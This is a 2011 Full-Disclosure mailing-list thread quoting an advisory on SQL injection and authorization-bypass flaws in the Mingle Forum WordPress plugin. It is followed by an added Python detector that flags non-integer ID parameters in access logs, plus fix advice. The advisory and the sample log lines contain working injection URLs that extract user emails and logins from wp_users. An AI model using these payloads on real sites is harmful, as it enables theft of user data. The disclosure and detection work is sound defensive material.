Message-ID: <4D289768.3080907@plumata.com>
Date: Sat, 08 Jan 2011 11:57:12 -0500
From: Charles Hooper <chooper@...mata.com>
To: Christian Sciberras <uuf6429@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Multiple Vulnerabilities in Mingle Forum (WordPress Plugin)

My bad ;) Regard those January dates as 2011

On 1/8/2011 10:37 AM, Christian Sciberras wrote:
> Wait, the developer fixed the plugin before he got the initial email?
>
> 12/17/2010 Initial email sent to plugin maintainer.
> ...
> 01/01/2010 Received response from plugin maintainer.
>
> :)
>
> On Sat, Jan 8, 2011 at 4:21 PM, Charles Hooper <chooper@...mata.com> wrote:
>
> 1. Advisory Information
>
> Title: Multiple Vulnerabilities in Mingle Forum (WordPress Plugin)
> Advisory URL: http://www.charleshooper.net/advisories/
> Date Published: January 8th, 2011
> Vendors Contacted: Paul Carter - Maintainer of plugin.
>
> 2. Summary
>
> Mingle Forum is a plugin for the popular blog tool and publishing
> platform, WordPress. According to the author of Mingle Forum, "Mingle
> Forum has been modified to be lightweight, solid, secure, quick to
> setup, [and] easy to use."
>
> There exist multiple vulnerabilities in Mingle Forum, SQL injection
> being among them.
>
> 3. Vulnerability Information
>
> Packages/Versions Affected: Confirmed on 1.0.24 and 1.0.26
>
> 3a. Type: SQL Injection [CWE-89]
> 3a. Impact: Read application data.
> 3a. Discussion: There is a SQL injection vulnerability present in the
> RSS feed generator. By crafting specific URLs an attacker can retrieve
> information from the MySQL database.
>
> 3b. Type: SQL Injection [CWE-89]
> 3b. Impact: Read application data.
> 3b. Discussion: There is a SQL injection vulnerability present in the
> `edit post` functionality. By crafting specific URLs an attacker can
> retrieve information from the MySQL database.
>
> 3c. Type: Auth Bypass via Direct Request [CWE-425]
> 3c. Impact: AuthZ is not performed for `edit post` functionality.
> 3c. Discussion: By browsing directly to the `edit post` page a user can
> view and edit any page.
>
> 4. PoC & Technical Description
>
> 4a.
>
> http://path.to/wordpress/wp-content/plugins/mingle-forum/feed.php?topic=0%20UNION%20SELECT%201,user_email,3,4,5,user_login,7%20FROM%20wp_users%20%23
>
> 4b.
>
> http://path.to/forums/?mingleforumaction=editpost&t=1.0&id=0%20UNION%20SELECT%201,2,3,4,5,6,7%20%23
>
> 4c.
>
> http://path.to/forums/?mingleforumaction=editpost&t=1.0&id=<target post ID>
>
> 5. Report Timeline
>
> 12/17/2010 Initial email sent to plugin maintainer.
> 12/22/2010 Confirmation of first email requested.
> 12/31/2010 Correct email address obtained. Maintainer contacted again on
> this date.
> 01/01/2010 Received response from plugin maintainer.
> 01/07/2010 Plugin maintainer releases update that addresses these
> vulnerabilities.
>
> 6. References
>
> 6a. The WordPress Plugin page for Mingle Forum:
> http://wordpress.org/extend/plugins/mingle-forum/
>
> 7. Legalese
>
> This vulnerability report by Charles Hooper <chooper@...mata.com> is
> licensed under a Creative Commons Attribution-NonCommercial-ShareAlike
> 3.0 Unported License.
>
> 8. Signature
>
> Public Key: Obtainable via pool.sks-keyservers.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
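For site operators who ran an affected Mingle Forum version before the 01/07 update, the two SQL injection issues (3a and 3b) share one observable trait: the `topic` and `id` parameters are supposed to be post/topic IDs, so any request where they are not a plain integer is worth a look in the web server access log. The following detector is an added example, not part of the advisory or the plugin; the log lines are constructed in combined log format, with the first two request URLs taken from the PoC section above and the third a benign feed fetch.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache/nginx combined format).
# Lines 1-2 carry the advisory's PoC URLs (4a, 4b); line 3 is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jan/2011:11:57:12 -0500] "GET /wp-content/plugins/mingle-forum/feed.php?topic=0%20UNION%20SELECT%201,user_email,3,4,5,user_login,7%20FROM%20wp_users%20%23 HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Jan/2011:11:58:03 -0500] "GET /forums/?mingleforumaction=editpost&t=1.0&id=0%20UNION%20SELECT%201,2,3,4,5,6,7%20%23 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jan/2011:12:01:44 -0500] "GET /wp-content/plugins/mingle-forum/feed.php?topic=42 HTTP/1.1" 200 3120 "-" "FeedReader/1.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Integer-typed parameters of the two endpoints named in 3a and 3b.
WATCH = {"feed": ("topic",), "editpost": ("id",)}


def endpoint_of(path, qs):
    """Map a request to an affected Mingle Forum endpoint, or None."""
    if path.endswith("/mingle-forum/feed.php"):
        return "feed"
    if qs.get("mingleforumaction", [""])[0] == "editpost":
        return "editpost"
    return None


def scan_log(text):
    """Return (ip, endpoint, param, decoded_value) for every request whose
    ID parameter is not a plain decimal integer; benign requests yield nothing."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        # parse_qs percent-decodes, so %20/%23 become space and '#'.
        qs = parse_qs(parts.query, keep_blank_values=True)
        ep = endpoint_of(parts.path, qs)
        if ep is None:
            continue
        for param in WATCH[ep]:
            for value in qs.get(param, []):
                if not re.fullmatch(r"\d+", value):
                    findings.append((m.group("ip"), ep, param, value))
    return findings


if __name__ == "__main__":
    for ip, ep, param, value in scan_log(SAMPLE_LOG):
        print(f"{ip} {ep} {param}={value!r}")
```

The same integer-only rule is also the fix on the application side: casting `topic` and `id` to an integer before they reach the query removes both injection points, and 3c additionally needs an ownership or capability check on the post being edited.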